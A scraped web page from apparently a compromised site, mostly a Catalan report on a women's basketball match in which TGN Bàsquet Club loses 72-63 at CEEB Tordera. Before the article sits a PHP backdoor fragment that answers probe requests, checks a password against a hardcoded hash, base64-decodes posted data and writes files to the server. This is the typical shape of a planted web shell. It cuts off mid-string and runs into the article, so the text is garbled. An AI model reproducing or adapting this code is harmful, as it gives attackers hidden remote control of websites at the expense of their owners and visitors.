function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Derrota a Tordera competint fins al final! -

Derrota a Tordera competint fins al final!

Updated: abril 22, 2023

Partit corresponent a la jornada 24 on el Sènior A ha visitat la complicada pista del CEEB Tordera, rival que es jugava entrar a la final a 4 per la promoció d’ascens a Lliga Fem. 2. L’equip ha competit de tu a tu els 40 minuts de partit contra un equip d’entitat, pero que finalment no han pogut sumar el dotzè triomf  a la lliga (72-63). Així doncs, el TGN Bàsquet Club suma un total d’11 victòries i 13 derrotes i se situa a la mitja taula de Copa Catalunya.

El matx ha començat amb molta intensitat d’ambdós equips amb una presió defensiva tota pista de l’equip local. Tot i així l’equip lila ha tirat d’#ADNTGN i ha sapigut plantar-li cara en tot moment. Al final del primer quart s’ha arribat amb el 21-16 favorable a les locals. En el segon quart, el TGN s’ha activat en defensa i ha estat encertat en atac,  aconseguint arribar al descans amb un ajustat 35-33 a l’electrònic.

Després del pas pels vestidors, el conjunt Lila ha sortit decidit a no abaixar els braços i continuar competint de tu a tu a un equip de la part alta de Copa Cat; i així ha sigut. Les bones defenses i l’encert en atac des del triple de les liles han provocat que en tot moment les tarragonines tinguessin opcions de posar-se per davant. Tot i això, un parcial favorable al Tordera (22-16) en el tercer quart ha fet créixer les diferències al marcador. En la recta final del partit, l’equip ho ha intentat fins al darrer segon del matx, però les locals han sabut controlar el ritme en tot moment i finalment consolidar un triomf important per l’equip gironí.

El proper partit serà contra Draft Gramenet al Pavelló del Sagrat Cor el diumenge 30 d’abril a les 19:00h.

”Hem complert el fet de competir partit rere partit i l’objectiu de les últimes dues jornades ha de ser fer créixer l’equip” – Marc Rovirosa